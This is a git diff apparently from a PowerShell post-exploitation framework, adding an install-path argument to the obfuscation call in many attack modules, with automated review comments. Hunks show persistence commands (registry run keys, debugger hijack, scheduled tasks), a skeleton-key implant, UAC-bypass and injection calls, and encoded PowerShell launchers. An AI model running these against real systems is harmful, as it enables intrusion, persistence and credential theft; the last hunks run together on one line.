+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/mailraider/get_subfolders.py b/lib/modules/powershell/management/mailraider/get_subfolders.py
index e61c68d..46856a1 100644
--- a/lib/modules/powershell/management/mailraider/get_subfolders.py
+++ b/lib/modules/powershell/management/mailraider/get_subfolders.py
@@ -87,6 +87,6 @@ class Module:
 scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/mailraider/mail_search.py b/lib/modules/powershell/management/mailraider/mail_search.py
index 9494cfd..f0c85fe 100644
--- a/lib/modules/powershell/management/mailraider/mail_search.py
+++ b/lib/modules/powershell/management/mailraider/mail_search.py
@@ -112,6 +112,6 @@ class Module:
 scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/mailraider/search_gal.py b/lib/modules/powershell/management/mailraider/search_gal.py
index db46b09..971e4e9 100644
--- a/lib/modules/powershell/management/mailraider/search_gal.py
+++ b/lib/modules/powershell/management/mailraider/search_gal.py
@@ -107,6 +107,6 @@ class Module:
 scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/mailraider/send_mail.py b/lib/modules/powershell/management/mailraider/send_mail.py
index d25094f..e5733ad 100644
--- a/lib/modules/powershell/management/mailraider/send_mail.py
+++ b/lib/modules/powershell/management/mailraider/send_mail.py
@@ -117,6 +117,6 @@ class Module:
 scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/mailraider/view_email.py b/lib/modules/powershell/management/mailraider/view_email.py
index 3495c56..f162fda 100644
--- a/lib/modules/powershell/management/mailraider/view_email.py
+++ b/lib/modules/powershell/management/mailraider/view_email.py
@@ -92,6 +92,6 @@ class Module:
 scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/psinject.py b/lib/modules/powershell/management/psinject.py
index 1c8c9da..cd22b64 100644
--- a/lib/modules/powershell/management/psinject.py
+++ b/lib/modules/powershell/management/psinject.py
@@ -133,6 +133,6 @@ class Module:
 else:
 scriptEnd += "Invoke-PSInject -ProcName %s -PoshCode %s" % (procName, launcherCode)
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/reflective_inject.py b/lib/modules/powershell/management/reflective_inject.py
index 1bb50a9..e5d19ea 100644
--- a/lib/modules/powershell/management/reflective_inject.py
+++ b/lib/modules/powershell/management/reflective_inject.py
@@ -146,7 +146,7 @@ class Module:
 UploadScript = self.mainMenu.stagers.generate_upload(dll, fullUploadPath)
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += "\r\n"
 script += UploadScript
diff --git a/lib/modules/powershell/management/restart.py b/lib/modules/powershell/management/restart.py
index 867a650..dee7562 100644
--- a/lib/modules/powershell/management/restart.py
+++ b/lib/modules/powershell/management/restart.py
@@ -52,5 +52,5 @@ class Module:
 script = "'Restarting computer';Restart-Computer -Force"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/management/runas.py b/lib/modules/powershell/management/runas.py
index c61dfb1..1978eb7 100644
--- a/lib/modules/powershell/management/runas.py
+++ b/lib/modules/powershell/management/runas.py
@@ -138,6 +138,6 @@ class Module:
 else:
 scriptEnd += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/sid_to_user.py b/lib/modules/powershell/management/sid_to_user.py
index 20f81c3..9978ce0 100644
--- a/lib/modules/powershell/management/sid_to_user.py
+++ b/lib/modules/powershell/management/sid_to_user.py
@@ -57,5 +57,5 @@ class Module:
 script = "(New-Object System.Security.Principal.SecurityIdentifier(\"%s\")).Translate( [System.Security.Principal.NTAccount]).Value" %(self.options['SID']['Value'])
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/management/spawn.py b/lib/modules/powershell/management/spawn.py
index 80e29df..30bd569 100644
--- a/lib/modules/powershell/management/spawn.py
+++ b/lib/modules/powershell/management/spawn.py
@@ -100,5 +100,5 @@ class Module:
 code = "Start-Process -NoNewWindow -FilePath \"%s\" -ArgumentList '%s'; 'Agent spawned to %s'" % (parts[0], " ".join(parts[1:]), listenerName)
 if obfuscate:
- code = helpers.obfuscate(psScript=code, obfuscationCommand=obfuscationCommand)
+ code = helpers.obfuscate(self.mainMenu.installPath, psScript=code, obfuscationCommand=obfuscationCommand)
 return code
diff --git a/lib/modules/powershell/management/spawnas.py b/lib/modules/powershell/management/spawnas.py
index 43151eb..d54baa6 100644
--- a/lib/modules/powershell/management/spawnas.py
+++ b/lib/modules/powershell/management/spawnas.py
@@ -157,6 +157,6 @@ class Module:
 scriptEnd += "-Cmd \"$env:public\debug.bat\""
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/switch_listener.py b/lib/modules/powershell/management/switch_listener.py
index 8d5b3da..e021401 100644
--- a/lib/modules/powershell/management/switch_listener.py
+++ b/lib/modules/powershell/management/switch_listener.py
@@ -71,5 +71,5 @@ class Module:
 # signal the existing listener that we're switching listeners, and the new comms code
 commsCode = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % (listenerName, commsCode)
 if obfuscate:
- commsCode = helpers.obfuscate(psScript=commsCode, obfuscationCommand=obfuscationCommand)
+ commsCode = helpers.obfuscate(self.mainMenu.installPath, psScript=commsCode, obfuscationCommand=obfuscationCommand)
 return commsCode
diff --git a/lib/modules/powershell/management/timestomp.py b/lib/modules/powershell/management/timestomp.py
index bb20f46..69a5b91 100644
--- a/lib/modules/powershell/management/timestomp.py
+++ b/lib/modules/powershell/management/timestomp.py
@@ -108,6 +108,6 @@ class Module:
 scriptEnd += "| Out-String"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/user_to_sid.py b/lib/modules/powershell/management/user_to_sid.py
index 861b7bd..b6bbddd 100644
--- a/lib/modules/powershell/management/user_to_sid.py
+++ b/lib/modules/powershell/management/user_to_sid.py
@@ -63,5 +63,5 @@ class Module:
 script = "(New-Object System.Security.Principal.NTAccount(\"%s\",\"%s\")).Translate([System.Security.Principal.SecurityIdentifier]).Value" %(self.options['Domain']['Value'], self.options['User']['Value'])
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/management/vnc.py b/lib/modules/powershell/management/vnc.py
index e3ef899..e8f4836 100644
--- a/lib/modules/powershell/management/vnc.py
+++ b/lib/modules/powershell/management/vnc.py
@@ -102,6 +102,6 @@ class Module:
 else:
 scriptEnd += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/wdigest_downgrade.py b/lib/modules/powershell/management/wdigest_downgrade.py
index c8edfda..ecec54f 100644
--- a/lib/modules/powershell/management/wdigest_downgrade.py
+++ b/lib/modules/powershell/management/wdigest_downgrade.py
@@ -151,5 +151,5 @@ function Invoke-WdigestDowngrade {
 else:
 script += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/management/zipfolder.py b/lib/modules/powershell/management/zipfolder.py
index 8771365..8dc5ca5 100644
--- a/lib/modules/powershell/management/zipfolder.py
+++ b/lib/modules/powershell/management/zipfolder.py
@@ -93,5 +93,5 @@ Invoke-ZipFolder"""
 if values['Value'] and values['Value'] != '':
 script += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/persistence/elevated/registry.py b/lib/modules/powershell/persistence/elevated/registry.py
index 8fd7f1d..2ab37ac 100644
--- a/lib/modules/powershell/persistence/elevated/registry.py
+++ b/lib/modules/powershell/persistence/elevated/registry.py
@@ -205,5 +205,5 @@ class Module:
 script += "'Registry persistence established "+statusMsg+"'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/persistence/elevated/schtasks.py b/lib/modules/powershell/persistence/elevated/schtasks.py
index 3f130c0..fbad434 100644
--- a/lib/modules/powershell/persistence/elevated/schtasks.py
+++ b/lib/modules/powershell/persistence/elevated/schtasks.py
@@ -161,7 +161,7 @@ class Module:
 script += "schtasks /Delete /F /TN "+taskName+";"
 script += "'Schtasks persistence removed.'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
 if extFile != '':
@@ -241,5 +241,5 @@ class Module:
 statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "."
 script += "'Schtasks persistence established "+statusMsg+"'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/persistence/elevated/wmi.py b/lib/modules/powershell/persistence/elevated/wmi.py
index 50e82a9..9b68e0c 100644
--- a/lib/modules/powershell/persistence/elevated/wmi.py
+++ b/lib/modules/powershell/persistence/elevated/wmi.py
@@ -124,7 +124,7 @@ class Module:
 script += "Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match '"+subName+"'} | Remove-WmiObject;"
 script += "'WMI persistence removed.'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
 if extFile != '':
@@ -199,5 +199,5 @@ class Module:
 script += "'WMI persistence established "+statusMsg+"'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/persistence/misc/add_netuser.py b/lib/modules/powershell/persistence/misc/add_netuser.py
index 0d41676..44fc980 100644
--- a/lib/modules/powershell/persistence/misc/add_netuser.py
+++ b/lib/modules/powershell/persistence/misc/add_netuser.py
@@ -107,5 +107,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/persistence/misc/add_sid_history.py b/lib/modules/powershell/persistence/misc/add_sid_history.py
index 914b281..9f148f2 100644
--- a/lib/modules/powershell/persistence/misc/add_sid_history.py
+++ b/lib/modules/powershell/persistence/misc/add_sid_history.py
@@ -90,6 +90,6 @@ class Module:
 # base64 encode the command to pass to Invoke-Mimikatz
 scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/persistence/misc/debugger.py b/lib/modules/powershell/persistence/misc/debugger.py
index 19be5a7..f9f8c6f 100644
--- a/lib/modules/powershell/persistence/misc/debugger.py
+++ b/lib/modules/powershell/persistence/misc/debugger.py
@@ -94,7 +94,7 @@ class Module:
 # the registry command to disable the debugger for Utilman.exe
 script = "Remove-Item 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\%s';'%s debugger removed.'" %(targetBinary, targetBinary)
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
@@ -133,5 +133,5 @@ class Module:
 # the registry command to set the debugger for the specified binary to be the binary path specified
 script = "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+targetBinary+"';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+targetBinary+"' -Name Debugger -Value '"+triggerBinary+"';'"+targetBinary+" debugger set to "+triggerBinary+"'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py b/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py
index d06efe4..1ef774a 100644
--- a/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py
+++ b/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py
@@ -61,10 +61,10 @@ class Module:
 if cleanup.lower() == 'true':
 script = "$null=Set-ItemProperty -Force -Path HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters -Name DisablePasswordChange -Value 0; 'Machine account password change re-enabled.'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
 script = "$null=Set-ItemProperty -Force -Path HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters -Name DisablePasswordChange -Value 1; 'Machine account password change disabled.'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
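Review bot: The `if obfuscate:` / `helpers.obfuscate(...)` / `return script` tail is written out twice in the disable_machine_acct_change hunk, once inside the `if cleanup.lower() == 'true':` branch and once after it, which is exactly the kind of duplication that made this sweep necessary in the first place. Assigning the cleanup string in that branch and the default string in an `else:`, then running a single obfuscate-and-return tail, keeps one call site per module so the next signature change touches it once. The elevated schtasks, elevated wmi, userland registry and userland schtasks hunks show the same early-return duplication, though there the two branches are further apart and the refactor is less mechanical. The enclosing function starts outside the hunk.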
diff --git a/lib/modules/powershell/persistence/misc/get_ssps.py b/lib/modules/powershell/persistence/misc/get_ssps.py
index 88a9c2c..5206dab 100644
--- a/lib/modules/powershell/persistence/misc/get_ssps.py
+++ b/lib/modules/powershell/persistence/misc/get_ssps.py
@@ -191,5 +191,5 @@ Get-SecurityPackages
 if values['Value'] and values['Value'] != '':
 script += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/persistence/misc/install_ssp.py b/lib/modules/powershell/persistence/misc/install_ssp.py
index d8f7df8..8e717d6 100644
--- a/lib/modules/powershell/persistence/misc/install_ssp.py
+++ b/lib/modules/powershell/persistence/misc/install_ssp.py
@@ -264,5 +264,5 @@ into lsass, the dll must export SpLsaModeInitialize.
 if values['Value'] and values['Value'] != '':
 script += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/persistence/misc/memssp.py b/lib/modules/powershell/persistence/misc/memssp.py
index 42d4e3a..2e6cabc 100644
--- a/lib/modules/powershell/persistence/misc/memssp.py
+++ b/lib/modules/powershell/persistence/misc/memssp.py
@@ -79,6 +79,6 @@ class Module:
 scriptEnd += '"memssp installed, check C:\Windows\System32\mimisla.log for logon events."'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/persistence/misc/skeleton_key.py b/lib/modules/powershell/persistence/misc/skeleton_key.py
index 36c3a52..58bc424 100644
--- a/lib/modules/powershell/persistence/misc/skeleton_key.py
+++ b/lib/modules/powershell/persistence/misc/skeleton_key.py
@@ -79,6 +79,6 @@ class Module:
 scriptEnd += '"Skeleton key implanted. Use password \'mimikatz\' for access."'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/persistence/powerbreach/deaduser.py b/lib/modules/powershell/persistence/powerbreach/deaduser.py
index 7c75df6..1ecb1b3 100644
--- a/lib/modules/powershell/persistence/powerbreach/deaduser.py
+++ b/lib/modules/powershell/persistence/powerbreach/deaduser.py
@@ -185,7 +185,7 @@ Invoke-DeadUserBackdoor"""
 return ""
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting
 modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
@@ -196,6 +196,6 @@ Invoke-DeadUserBackdoor"""
 # set up the start-process command so no new windows appears
 scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-DeadUserBackdoor started'" % (parts[0], " ".join(parts[1:]))
 if obfuscate:
- scriptLauncher = helpers.obfuscate(psScript=scriptLauncher, obfuscationCommand=obfuscationCommand)
+ scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand)
 return scriptLauncher
diff --git a/lib/modules/powershell/persistence/powerbreach/eventlog.py b/lib/modules/powershell/persistence/powerbreach/eventlog.py
index eab55ee..faa4236 100644
--- a/lib/modules/powershell/persistence/powerbreach/eventlog.py
+++ b/lib/modules/powershell/persistence/powerbreach/eventlog.py
@@ -160,7 +160,7 @@ Invoke-EventLogBackdoor"""
 return ""
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting
 modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
@@ -171,7 +171,7 @@ Invoke-EventLogBackdoor"""
 # set up the start-process command so no new windows appears
 scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-EventLogBackdoor started'" % (parts[0], " ".join(parts[1:]))
 if obfuscate:
- scriptLauncher = helpers.obfuscate(psScript=scriptLauncher, obfuscationCommand=obfuscationCommand)
+ scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand)
 print scriptLauncher
diff --git a/lib/modules/powershell/persistence/powerbreach/resolver.py b/lib/modules/powershell/persistence/powerbreach/resolver.py
index 554a3cc..c26a99a 100644
--- a/lib/modules/powershell/persistence/powerbreach/resolver.py
+++ b/lib/modules/powershell/persistence/powerbreach/resolver.py
@@ -172,7 +172,7 @@ Invoke-ResolverBackdoor"""
 return ""
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting
 modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
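Review bot: The second eventlog hunk ends with `print scriptLauncher` right after the obfuscation call, whereas the deaduser and resolver counterparts go straight to `return scriptLauncher`; this looks like a leftover debug statement, and it writes the full generated launcher to the console (and to anything capturing stdout) on every generation. Unless the echo is intentional, remove the `print` so the module behaves like its siblings. The function continues past the hunk, so the actual `return` is presumably a few lines below and is not visible here.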
@@ -183,5 +183,5 @@ Invoke-ResolverBackdoor""" # set up the start-process command so no new windows appears scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-EventLogBackdoor started'" % (parts[0], " ".join(parts[1:])) if obfuscate: - scriptLauncher = helpers.obfuscate(psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) + scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) return scriptLauncher diff --git a/lib/modules/powershell/persistence/userland/backdoor_lnk.py b/lib/modules/powershell/persistence/userland/backdoor_lnk.py index 87e8009..822f03c 100644 --- a/lib/modules/powershell/persistence/userland/backdoor_lnk.py +++ b/lib/modules/powershell/persistence/userland/backdoor_lnk.py @@ -180,6 +180,6 @@ class Module: scriptEnd += " -EncScript '%s'" %(encScript) scriptEnd += "; \"Invoke-BackdoorLNK run on path '%s' with stager for listener '%s'\"" %(lnkPath,listenerName) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/userland/registry.py b/lib/modules/powershell/persistence/userland/registry.py index 651a008..57042d2 100644 --- a/lib/modules/powershell/persistence/userland/registry.py +++ b/lib/modules/powershell/persistence/userland/registry.py 
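Review bot: The status string built in resolver.py's `@@ -183,5` hunk still says `'PowerBreach Invoke-EventLogBackdoor started'`, a copy-paste leftover from eventlog.py, so operator output will attribute the resolver backdoor to the wrong module. Change the tail of the scriptLauncher format string to `'PowerBreach Invoke-ResolverBackdoor started'`. The enclosing generate() starts outside the hunk.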
@@ -149,7 +149,7 @@ class Module: script += "Remove-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+";" script += "'Registry Persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -236,5 +236,5 @@ class Module: script += "'Registry persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/userland/schtasks.py b/lib/modules/powershell/persistence/userland/schtasks.py index 2abed9e..e4adc53 100644 --- a/lib/modules/powershell/persistence/userland/schtasks.py +++ b/lib/modules/powershell/persistence/userland/schtasks.py @@ -155,7 +155,7 @@ class Module: script += "schtasks /Delete /F /TN "+taskName+";" script += "'Schtasks persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -234,5 +234,5 @@ class Module: script += "'Schtasks persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/privesc/ask.py b/lib/modules/powershell/privesc/ask.py index a1bb865..83992a1 100644 --- a/lib/modules/powershell/privesc/ask.py +++ b/lib/modules/powershell/privesc/ask.py 
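Review bot: In the registry.py removal hunk, `-Name "+keyName+";"` splices the operator-supplied key name into Remove-ItemProperty unquoted, so a name containing whitespace or a PowerShell metacharacter (`;`, `|`, `$`) is split into extra arguments or changes the command; the schtasks.py hunk's `/TN "+taskName+";"` has the same shape. Quoting the value keeps the generated script well-formed, e.g. `-Name '" + keyName.replace("'", "''") + "';"` and `/TN '" + taskName.replace("'", "''") + "';"`. The enclosing generate() bodies start outside these hunks.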
@@ -113,5 +113,5 @@ else { } ''' %(encLauncher) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/privesc/bypassuac.py b/lib/modules/powershell/privesc/bypassuac.py index f24cea2..2ecdaaf 100644 --- a/lib/modules/powershell/privesc/bypassuac.py +++ b/lib/modules/powershell/privesc/bypassuac.py @@ -115,6 +115,6 @@ class Module: else: scriptEnd = "Invoke-BypassUAC -Command \"%s\"" % (launcher) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/bypassuac_eventvwr.py b/lib/modules/powershell/privesc/bypassuac_eventvwr.py index fcbbb10..85fb4f2 100644 --- a/lib/modules/powershell/privesc/bypassuac_eventvwr.py +++ b/lib/modules/powershell/privesc/bypassuac_eventvwr.py @@ -110,6 +110,6 @@ class Module: else: scriptEnd = "Invoke-EventVwrBypass -Command \"%s\"" % (encScript) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py b/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py index 2ac1c2f..0606e5c 100644 --- a/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py +++ b/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py 
